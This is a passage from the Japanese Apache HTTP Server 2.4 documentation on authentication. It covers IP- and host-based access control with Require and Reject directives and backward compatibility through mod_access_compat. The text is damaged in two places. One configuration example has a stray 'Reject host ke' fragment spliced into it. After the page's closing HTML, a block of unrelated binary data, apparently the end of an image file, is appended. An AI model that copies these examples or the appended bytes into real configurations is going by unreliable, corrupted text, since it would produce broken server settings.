        <div class="example"><p><code>
          Require ip <var>address</var>
        </code></p></div>
    
        <p>ここで、<var>address</var> は IP アドレス (あるいは IP アドレスの
        侀郹) か : </p>
    
        <div class="example"><p><code>
          Require host <var>domain_name</var>
        </code></p></div>
    
        <p>ここで <var>domain_name</var> は FQDN (あるいはドメむン名の䞀郚)
        で、必芁であれば耇数のアドレスやドメむン名を曞くこずができたす。</p>
    
        <p>たずえば、スパムメッセヌゞを送信しおくる誰かを拒吊したい堎合、
        次のようになりたす : </p>
    
        <div class="example"><p><code>
          Reject ip 10.252.46.165
        </code></p></div>
    
        <p>このディレクティブが有効な範囲のコンテンツに察しおは、
        そのアドレスからアクセスしおきおも芋るこずができたせん。
        もしマシン名がわかっおいお IP アドレスよりもそちらで
        指定したいのであれば、そのマシン名が䜿えたす。</p>
    
        <div class="example"><p><code>
          Reject host <var>host.example.com</var>
        </code></p></div>
    
        <p>たた、特定のドメむンからのアクセス党おをブロックしたい堎合は、
        IP アドレスの䞀郚や、ドメむン名が指定できたす :</p>
    
        <div class="example"><p><code>
          &lt;SatisfyAll&gt;<br />
          <span class="indent">
            Reject ip <var>192.168.205</var><br />
            Reject host <var>phishers.example.com</var> <var>moreidiots.example</var><br />           Reject host ke<br />
          </span>
          &lt;/SatisfyAll&gt;
        </code></p></div>
    
        <p><code class="directive"><a href="../mod/mod_authz_host.html#reject">Reject</a></code> ディレクティブを
        <code class="directive"><a href="../mod/mod_authz_core.html#&lt;satisfyall&gt;">&lt;SatisfyAll&gt;</a></code> ブロックの䞭で䜿うず、
        蚱可したいグルヌプにのみアクセスができるように確認できたす。</p>
    
        <p>䞊蚘の䟋では <code class="directive"><a href="../mod/mod_authz_core.html#&lt;satisfyall&gt;">&lt;SatisfyAll&gt;</a></code>
        を䜿っお、アクセスに合栌する前段階で、党おの 
        <code class="directive"><a href="../mod/mod_authz_host.html#reject">Reject</a></code> ディレクティブが
        満たされおいるこずを確認しおいたす。</p>
    
    

    <h3><a name="filesystem" id="filesystem">アクセス制埡の埌方互換性</a></h3>
        <p>認蚌プロバむダベヌスの機構があるため、以前䜿甚されおいたディレクティブ
        <code class="directive"><a href="../mod/mod_access_compat.html#order">Order</a></code>,
        <code class="directive"><a href="../mod/mod_access_compat.html#allow">Allow</a></code>,
        <code class="directive"><a href="../mod/mod_access_compat.html#deny">Deny</a></code>,
        <code class="directive"><a href="../mod/mod_access_compat.html#satisfy">Satisfy</a></code>
        は必芁なくなりたした。
        ずはいうものの、叀い蚭定ファむルでの埌方互換性を提䟛するため、
        これらのディレクティブは <code class="module"><a href="../mod/mod_access_compat.html">mod_access_compat</a></code> モゞュヌルに移されたした。</p>

        <p>これらのディレクティブの抱えおいた問題のひず぀に、承認の蚭定行ずアクセス制埡の蚭定行の
        関係がずおもあいたいだったこずが挙げられたす。
        <code class="directive"><a href="../mod/mod_access_compat.html#satisfy">Satisfy</a></code> ディレクティブは
        リク゚スト凊理䞭でそれ自身を呌び出すこずによっお、これらの 2 ぀の凊理段階を結び぀けようずしたす。
        珟圚は、これらのディレクティブは <code class="module"><a href="../mod/mod_access_compat.html">mod_access_compat</a></code> に移動し、
        新しい認蚌ディレクティブず叀いアクセス制埡ディレクティブを混ぜお䜿うこずは
        難しくなっおいたす。この問題のため、<code class="module"><a href="../mod/mod_authz_default.html">mod_authz_default</a></code> モゞュヌルを
        ロヌドするこずがずおも重芁で、必須になっおいたす。
        <code class="module"><a href="../mod/mod_authz_default.html">mod_authz_default</a></code> モゞュヌルの䞻な目的は、どの承認プロバむダで
        凊理されなかった承認リク゚ストを受けるこずにありたす。
        しかし、叀いアクセス制埡ディレクティブが甚いられた堎合には、
        アクセス制埡ず承認を結び぀けお、すべおの凊理段階の出力結果を芋おアクセスに合栌するかを決めおいたす。
        ですから、叀いディレクティブがうたく動䜜しない堎合は、
        <code class="module"><a href="../mod/mod_authz_default.html">mod_authz_default</a></code> がロヌドされおいないからかもしれない、
        ず疑っおみおください。</p>

    

</div><div class="top"><a href="#page-header"><img alt="top" src="../images/up.gif" /></a></div>
<div class="section">
<h2><a name="moreinformation" id="moreinformation">远加情報</a></h2>
    <p>これら党おがどのように動䜜するかに぀いお
    もっず倚くの情報が曞かれおいる <code class="module"><a href="../mod/mod_auth_basic.html">mod_auth_basic</a></code> ず
    <code class="module"><a href="../mod/mod_authz_host.html">mod_authz_host</a></code>
    の文曞も読むずよいでしょう。
    <code class="directive"><a href="../mod/mod_authn_core.html#&lt;authnprovideralias&gt;">&lt;AuthnProviderAlias&gt;</a></code>
    ディレクティブを䜿うず、特定の認蚌蚭定が簡単に曞けるようになりたす。</p>

    <p><a href="access.html">アクセス制埡</a>の方法も、
    関連するトピックがたくさん蚘茉されおいたすので、ご芧ください。</p>

</div></div>
<div class="bottomlang">
<p><span>翻蚳枈み蚀語: </span><a href="../en/howto/auth.html" hreflang="en" rel="alternate" title="English">&nbsp;en&nbsp;</a> |
<a href="../fr/howto/auth.html" hreflang="fr" rel="alternate" title="Français">&nbsp;fr&nbsp;</a> |
<a href="../ja/howto/auth.html" title="Japanese">&nbsp;ja&nbsp;</a> |
<a href="../ko/howto/auth.html" hreflang="ko" rel="alternate" title="Korean">&nbsp;ko&nbsp;</a> |
<a href="../tr/howto/auth.html" hreflang="tr" rel="alternate" title="TÌrkçe">&nbsp;tr&nbsp;</a></p>
</div><div class="top"><a href="#page-header"><img src="../images/up.gif" alt="top" /></a></div><div class="section"><h2><a id="comments_section" name="comments_section">コメント</a></h2><div class="warning"><strong>Notice:</strong><br />This is not a Q&amp;A section. Comments placed here should be pointed towards suggestions on improving the documentation or server, and may be removed again by our moderators if they are either implemented or considered invalid/off-topic. Questions on how to manage the Apache HTTP Server should be directed at either our IRC channel, #httpd, on Freenode, or sent to our <a href="http://httpd.apache.org/lists.html">mailing lists</a>.</div>
<script type="text/javascript"><!--//--><![CDATA[//><!--
var comments_shortname = 'httpd';
var comments_identifier = 'http://httpd.apache.org/docs/2.4/howto/auth.html';
(function(w, d) {
    if (w.location.hostname.toLowerCase() == "httpd.apache.org") {
        d.write('<div id="comments_thread"><\/div>');
        var s = d.createElement('script');
        s.type = 'text/javascript';
        s.async = true;
        s.src = 'https://comments.apache.org/show_comments.lua?site=' + comments_shortname + '&page=' + comments_identifier;
        (d.getElementsByTagName('head')[0] || d.getElementsByTagName('body')[0]).appendChild(s);
    }
    else { 
        d.write('<div id="comments_thread">Comments are disabled for this page at the moment.<\/div>');
    }
})(window, document);
//--><!]]></script></div><div id="footer">
<p class="apache">Copyright 2015 The Apache Software Foundation.<br />この文曞は <a href="http://www.apache.org/licenses/LICENSE-2.0">Apache License, Version 2.0</a> のラむセンスで提䟛されおいたす。.</p>
<p class="menu"><a href="../mod/">モゞュヌル</a> | <a href="../mod/directives.html">ディレクティブ</a> | <a href="http://wiki.apache.org/httpd/FAQ">FAQ</a> | <a href="../glossary.html">甚語</a> | <a href="../sitemap.html">サむトマップ</a></p></div><script type="text/javascript"><!--//--><![CDATA[//><!--
if (typeof(prettyPrint) !== 'undefined') {
    prettyPrint();
}
//--><!]]></script>
</body></html>
ß yôÊáœ~ŒorÀ5ÖJ™={þÁEÇêeŸu磝Qk®•ᯘG{÷?ù»ã+—]üôçƒÉÍ×ןô?wûM3X^¶Ú歌>{Ž7ÙŸìŽKã>èo²ÎnÝ\ÿªÊj¿y·ðR £õãg/î=ÞÿfúOçÖr·o×NVÊv¿ú~ÿY+ü¿NGêu÷ø·Ã®›þë¹HWŠûyëwÆ[eQ¶ÊšŸSÚb­Ö>öÍËÇþ³>ä}Gçmx[o[<ÞÚ{ðýŸÏ®_ÅïqF– ÚÛvMIEND®B`‚